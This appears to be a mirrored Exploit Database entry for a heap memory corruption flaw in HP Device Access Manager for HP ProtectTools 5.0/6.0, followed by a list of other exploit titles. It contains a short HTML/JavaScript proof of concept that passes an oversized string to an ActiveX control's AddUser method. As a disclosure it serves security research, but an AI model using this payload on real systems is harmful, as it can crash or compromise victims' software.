HP Device Access Manager for HP ProtectTools 5.0/6.0 – Heap Memory Corruption

Exploit Database
40 阅读

作者： High-Tech Bridge SA

日期： 2011-12-02
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/36403/

source: https://www.securityfocus.com/bid/50895/info

HP Device Access Manager for HP ProtectTools is prone to a remote heap-memory-corruption vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

HP Device Access Manager for HP ProtectTools versions prior to 6.1.0.1 are vulnerable.

<HTML>
<BODY>
<object id="target"
classid="clsid:{1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B}"></object>
<SCRIPT language="JavaScript">
function Do_It()
{
arg1=String(1044, "X")
target.AddUser arg1
}
</SCRIPT>
<input onclick="Do_It()" type="button" value="P0c">
</BODY>
</HTML>

last Exploits
HP Device Access Manager for HP ProtectTools 5.0/6.0 – Heap Memory Corruption的更多信息

Vallen Zipper 2.30 – ‘.zip’ Heap Overflow：
RPM Select/Elite 5.0 – ‘.xml Configuration parsing’ Unicode Buffer Overflow (PoC)：
Mozilla Firefox 3.6.3 – XSLT Sort Remote Code Execution：
MooPlayer 1.3.0 – ‘m3u’ Buffer Overflow (SEH) (PoC)：
Microsoft Windows – Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase：
Adobe Flash AS2 – textfield.filters Use-After-Free (2)：
Adobe Flash – BitmapData.drawWithQuality Heap Overflow：
Adobe Acrobat CoolType (AFDKO) – Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts：